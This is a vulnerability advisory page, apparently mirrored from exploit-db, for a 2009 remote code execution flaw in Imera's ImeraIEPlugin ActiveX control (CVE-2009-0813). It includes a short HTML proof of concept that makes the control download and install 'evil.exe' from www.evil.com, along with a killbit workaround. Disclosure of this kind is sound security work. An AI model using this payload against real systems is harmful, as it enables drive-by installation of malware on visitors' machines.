Lucene search
ElazarEDB-ID:8144HistoryMar 03, 2009 - 12:00 a.m.
Imera ImeraIEPlugin - ActiveX Control Remote Code Execution
2009-03-0300:00:00
Elazar
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
Who:
Imera(http://www.imera.com)
Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
What:
ImeraIEPlugin.dll
Version 1.0.2.54
Dated 12/02/2008
{75CC8584-86D4-4A50-B976-AA72618322C6}
http://teamlinks.imera.com/ImeraIEPlugin.cab
How:
This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.
Exploiting this issue is quite simple, like so:
<object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
id="obj">
<param name="DownloadProtocol" value="http" />
<param name="DownloadHost" value="www.evil.com" />
<param name="DownloadPort" value="80" />
<param name="DownloadURI" value="evil.exe" />
</object>
Fix:
The vendor has been notified.
Workaround:
Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html
Elazar
# milw0rm.com [2009-03-03]Related
openvas
openvas
Imera TeamLinks ImeraIEPlugin.dll ActiveX Control DoS Vulnerability
2009-03-23 00:00:00
Imera TeamLinks ImeraIEPlugin.dll ActiveX Control DoS Vulnerability
2009-03-23 00:00:00
prion
prion
Design/Logic Flaw
2009-03-05 02:30:00
nvd
nvd
CVE-2009-0813
2009-03-05 02:30:00
cve
cve
CVE-2009-0813
2009-03-05 02:30:00
cvelist
cvelist
CVE-2009-0813
2009-03-05 02:00:00